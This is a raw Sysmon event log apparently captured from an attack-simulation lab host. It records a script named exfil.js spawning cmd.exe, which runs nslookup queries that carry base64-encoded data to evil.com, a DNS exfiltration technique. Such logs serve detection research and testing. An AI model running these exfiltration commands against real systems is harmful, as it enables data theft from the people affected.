51791 10341000x8000000000000000195960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-833E-000000005F02}1276C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-17AD-629A-813E-000000005F02}50407284C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-833E-000000005F02}1276C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.584{2E1864BB-17AD-629A-833E-000000005F02}1276C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-813E-000000005F02}5040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfitlsb.tmp 2>&1 10341000x8000000000000000195956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.549{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-823E-000000005F02}1132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.549{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-823E-000000005F02}1132C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.549{2E1864BB-17AD-629A-823E-000000005F02}11327376C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-813E-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.533{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-823E-000000005F02}1132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000195952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.061{00000000-0000-0000-0000-000000000000}5124evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.888{00000000-0000-0000-0000-000000000000}7712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.736{00000000-0000-0000-0000-000000000000}3832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.616{00000000-0000-0000-0000-000000000000}32evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.495{00000000-0000-0000-0000-000000000000}7300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.356{00000000-0000-0000-0000-000000000000}2104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.182{00000000-0000-0000-0000-000000000000}5064evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.073{00000000-0000-0000-0000-000000000000}7764evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000195944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-813E-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-17A1-629A-783D-000000005F02}55526148C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-813E-000000005F02}5040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.529{2E1864BB-17AD-629A-813E-000000005F02}5040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfitlsb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.517{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzjhx.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.480{2E1864BB-17AD-629A-7F3E-000000005F02}68562516C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-803E-000000005F02}908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-803E-000000005F02}908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.449{2E1864BB-17AD-629A-7E3E-000000005F02}78521692C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-803E-000000005F02}908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.461{2E1864BB-17AD-629A-803E-000000005F02}908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-7E3E-000000005F02}7852C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzjhx.tmp 2>&1 10341000x8000000000000000195928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.417{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-7F3E-000000005F02}6856C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.417{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-7F3E-000000005F02}6856C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.411{2E1864BB-17AD-629A-7F3E-000000005F02}68562516C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-7E3E-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000195925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.395{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8476E5000B2FC3153BCCBFA04E7D0457,SHA256=97F9DC1BC2AB45D8175E3A0CBE8BABD92A6B8591D594B209D61F5A8B590BCEC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.395{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7F3E-000000005F02}6856C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 